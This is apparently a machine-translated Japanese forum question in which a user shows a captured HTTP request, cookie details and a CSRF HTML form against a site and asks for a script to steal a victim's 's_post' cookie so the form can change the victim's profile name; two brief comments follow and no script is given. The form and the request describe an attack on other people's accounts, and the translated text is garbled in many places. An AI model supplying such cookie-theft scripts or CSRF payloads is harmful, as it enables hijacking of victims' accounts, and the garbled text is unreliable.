私はウェブサイト(ここではその名前はIT www.targetsite.com)に対してCSRFの脆弱性をテストしたいと考えています。 1の値を得ることができる場合特定のCookieの値を盗むにはどうすればよいですか?
リクエストヘッダ
http://www.targetsite.com/?area=EditPersonalInfo&force_wap=1
POST/HTTP/1.1
Host : www.targetsite.com
User-Agent : Mozilla/Firefox
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language : en-US,en;q=0.5
Accept-Encoding : gzip, deflate
Referer : http://www.targetsite.com/?area=EditPersonalInfo&force_wap=1
Cookie : return_token=XXXXXXXXXXXXXXXX; mmbsid=XXXXXXXXXXXXX; s_post=XXXXXXXXXXXXXXX; mmbTracker=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXx; mmbTrackerTarget=.targetsite.com; LOGIN=XXXXXXXXX; start_with_auth_form=1; mmbUID=XXXXXXXXXX; UID=XXXXXXXXX; mmbSECRET=XXXXXXXXXX; SECRET=XXXXXXX; LEVEL=Low; registered_once=1; mmbsid=XXXXXXXXXXXXXXXXX; unauth_lang=3
POSTデータ
s_post=xxxxxxxxxxxxxx&personal_name=Rogers&submitted=Save&force_wap=1
:ACCOUNT者の個人情報の変更について、HTTPリクエストは、次のように送信されますPOST DATAに "s_post"があれば、Webサイトに対して簡単にcsrf攻撃を実行できます。そして、主なものは、 "s_post"の値がクッキーに存在することです(クッキーの名前はログイン時にユーザに与えられるs_post &です。これは、httpOnlyクッキーではありません)。したがって、スクリプトを使用して "s_post"という名前のCookie(ユーザーのブラウザに存在する)の値を取得できれば、簡単にcsrfを実行できます(Postデータの値の代わりにCookieの値を挿入する"s_post = COOKIE VALUE GOESここに& personal_name = DESIREDNAMEはここに&を投稿しました= & force_wap = 1"を保存しました....)... "私は、犠牲者のブラウザに保存された" s_post "という名前のクッキーの価値を盗むスクリプトが必要です...クッキーの
詳細は以下の通りです:
Name : s_post
Value : XXXXXXXXXXXXXXXXXXXXX
Host : .www.targetsite.com
Path :/
Expires At : At End Of Session
Secure : No
HTTP Only : No
ここで私はCSRFを実行するために使用する形式です。
<form name="csrf_form" method="POST" action="http://m.targetsite.com/?area=EditPersonalInfo&force_wap=1">
<input type="text" id="s_post" name="s_post" value="HERE I WANT THE VALUE OF A COOKIE NAMED s_post">
<input type="text" id="personal_name" name="personal_name" value="Steve">
<input type="text" id="submitted" name="submitted" value="Save">
<input type="text" id="force_wap" name="force_wap" value="1">
</form>
&は自動的にHTML形式の値です入れたクッキー&の値を盗むことができるスクリプトがあるかどう....下記のコメント OR私にそのスクリプトをお願いしてください...私の人を助けてください唯一のクッキーの値...事前に
感謝:)クッキーのデータを盗むする一般的な手段がありません
Java!= Javascript –
YELLしないでください。 – C14L